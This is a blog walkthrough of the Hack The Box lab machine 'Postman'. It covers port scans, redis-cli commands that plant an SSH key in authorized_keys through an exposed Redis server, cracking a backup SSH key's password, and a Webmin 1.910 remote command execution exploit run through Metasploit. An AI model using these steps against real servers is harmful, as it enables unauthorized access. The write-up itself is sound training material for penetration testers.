On this post
- Information Gathering
- Privilege Escalation
Postman is a retired vulnerable VM from Hack The Box.
Let’s start with a
masscan probe to establish the open ports in the host.
# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.160 --rate=1000 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2019-11-03 13:51:36 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 10000/tcp on 10.10.10.160 Discovered open port 6379/tcp on 10.10.10.160 Discovered open port 80/tcp on 10.10.10.160 Discovered open port 22/tcp on 10.10.10.160
Interesting list of open ports. Let’s do one better with
nmap scanning the discovered ports to establish their services.
# nmap -n -v -Pn -p22,80,6379,10000 -A --reason -oN nmap.txt 10.10.10.160 ... PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA) | 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA) |_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519) 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: E234E3E8040EFB1ACD7028330A956EBF | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: The Cyber Geek's Personal Website 6379/tcp open redis syn-ack ttl 63 Redis key-value store 4.0.9 10000/tcp open http syn-ack ttl 63 MiniServ 1.910 (Webmin httpd) |_http-favicon: Unknown favicon MD5: 91549383E709F4F1DD6C8DAB07890301 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Hmm. Other than the usual
http services, we also have Redis and MiniServ running. Anyhow, this is what the
http site looks like.
Redis SSH Backdoor
Anyway since the Redis service is available, let’s check and see what we can glean from there.
Interesting. The creator seems to be suggesting that there’s a
redis SSH account and the way to get a foothold is to dump a SSH public key we control to
That should be easy.
ssh-keygen -f redis
echo -ne "\n\n" > public; cat redis.pub >> public
redis-cli -h 10.10.10.160 SLAVEOF NO ONE
cat public | redis-cli -h 10.10.10.160 -x set pub
redis-cli -h 10.10.10.160 CONFIG SET dbfilename authorized_keys
redis-cli -h 10.10.10.160 SAVE
I’ve incorporated the above steps into a script to save a bit of time because many HTB players are chasing after a Metasploit exploit that somehow didn’t work as expected.
Matt’s Backup SSH Key
During enumeration of
redis’s account, I noticed that there is another account with UID 1000 (Matt). That would mean that the file
user.txt is in Matt’s home directory.
Look what we found!
Matt is careless to leave a backup of his password-protected SSH private key around.
Something else is up. Notice that Matt cannot login via SSH.
What good is a password-protected private key if we can’t login via SSH? Well, we can crack the key’s password and see what it brings us.
And guess what. We can
su as Matt with that password.
There you have it. The file
user.txt is indeed in Matt’s home directory.
During enumeration of Matt’s account, I noticed the presence of a file in
/etc/webmin/Matt.acl, which sort of gave me an idea—maybe Matt is able to log in to the Webmin using the same credential (
Webmin 1.910 - ‘Package Updates’ Remote Command Execution
Long story short. As much as I wanted to avoid Metasploit, this is one exploit that executes better with it.
This is way too easy.